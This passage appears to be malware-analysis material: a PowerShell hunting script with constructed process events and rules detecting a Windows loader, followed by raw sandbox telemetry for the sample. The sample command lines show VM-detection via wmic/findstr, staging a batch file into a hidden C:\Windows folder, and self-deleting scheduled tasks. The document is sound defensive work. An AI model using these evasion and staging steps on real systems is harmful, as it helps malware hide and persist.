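    [pscustomobject]@{ Id=1; ParentImage='C:\Windows\System32\cmd.exe'; Image='C:\Windows\System32\wbem\WMIC.exe'; CommandLine='wmic diskdrive get Model' }
    [pscustomobject]@{ Id=1; ParentImage='C:\Windows\System32\cmd.exe'; Image='C:\Windows\System32\findstr.exe'; CommandLine='findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"' }
    [pscustomobject]@{ Id=1; ParentImage='C:\Windows\System32\cmd.exe'; Image='C:\Windows\System32\cmd.exe'; CommandLine=$loaderCmd }
    [pscustomobject]@{ Id=1; ParentImage='C:\Windows\System32\cmd.exe'; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine='powershell.exe -WindowStyle Hidden' }
    [pscustomobject]@{ Id=1; ParentImage='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; Image='C:\Windows\System32\cmd.exe'; CommandLine='"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\x.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat' }
    [pscustomobject]@{ Id=1; ParentImage='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; Image='C:\Windows\System32\schtasks.exe'; CommandLine='"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F' }
    [pscustomobject]@{ Id=7; Image='C:\Windows\System32\lsass.exe'; ImageLoaded='C:\Windows\System32\amsi.dll' }
    [pscustomobject]@{ Id=7; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ImageLoaded='C:\Windows\System32\amsi.dll' }   # benign: script host
    [pscustomobject]@{ Id=1; ParentImage='C:\Windows\explorer.exe'; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine='powershell.exe -File C:\scripts\backup.ps1' }   # benign control
)

# Images expected to map amsi.dll (assumed starter allowlist; tune to your baseline).
$amsiHosts = @('powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'WMIC.exe')

$rules = @(
    @{ Name = 'VM disk-model check (wmic diskdrive | findstr)'
       Test = { param($e) $e.Id -eq 1 -and $e.Image -like '*\findstr.exe' -and
                $e.CommandLine -match '(?i)QEMU HARDDISK|DADY HARDDISK|WDS100T2B0A' } }
    @{ Name = 'Star-split obfuscated loader echoed into a child shell'
       Test = { param($e) $e.Id -eq 1 -and $e.Image -like '*\cmd.exe' -and
                $e.CommandLine -match "(?i)Invoke-Expression\s+'[^']*\*[^']*'\.Replace\('\*',\s*''\)" } }
    @{ Name = 'Hidden PowerShell from cmd.exe without -Command/-File (script on stdin)'
       Test = { param($e) $e.Id -eq 1 -and $e.Image -like '*\powershell.exe' -and
                $e.ParentImage -like '*\cmd.exe' -and
                $e.CommandLine -match '(?i)-WindowStyle\s+Hidden' -and
                $e.CommandLine -notmatch '(?i)\s-(Command|File|EncodedCommand|c|f|e|ec)\b' } }
    @{ Name = 'Launching .bat copied into C:\Windows\$<tag>-onimai2'
       Test = { param($e) $e.Id -eq 1 -and $e.CommandLine -match '(?i)\\Windows\\\$[a-z0-9]+-onimai2\\' } }
    @{ Name = 'Loader deletes its own scheduled task'
       Test = { param($e) $e.Id -eq 1 -and $e.Image -like '*\schtasks.exe' -and
                $e.CommandLine -match '(?i)/Delete\s+/TN\s+"?\$' } }
    @{ Name = 'amsi.dll mapped into a process that is not a script host'
       Test = { param($e) $e.Id -eq 7 -and $e.ImageLoaded -like '*\amsi.dll' -and
                $amsiHosts -notcontains (Split-Path -Leaf $e.Image) } }
)

function Invoke-LoaderHunt {
    param([object[]]$Events, [hashtable[]]$Rules)
    foreach ($e in $Events) {
        foreach ($r in $Rules) {
            if (& $r.Test $e) {
                $detail = if ($e.Id -eq 1) { $e.CommandLine } else { $e.ImageLoaded }
                [pscustomobject]@{ Rule = $r.Name; Image = (Split-Path -Leaf $e.Image); Detail = $detail }
            }
        }
    }
}

Invoke-LoaderHunt -Events $events -Rules $rules | Format-Table -AutoSize -Wrap
```

Against the constructed records the six hostile events each match exactly one rule and the two benign controls match none. The hidden-PowerShell rule deliberately requires a cmd.exe parent and the absence of any script or command argument, because `-WindowStyle Hidden` alone is common in legitimate scheduled jobs; the amsi.dll rule is the one worth running on a live host as well (`Get-Process | Where-Object { $_.Modules.ModuleName -contains 'amsi.dll' }` lists current loaders), since a .NET or script runtime inside lsass.exe or winlogon.exe has no benign explanation.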
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\dllhost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\winlogon.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exeSection loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: mscoree.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: apphelp.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: version.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: windows.storage.dll
Source: C:\Windows\$nya-onimai2\IfMUlU.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: x.batStatic file information: File size 7312129 > 1048576
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

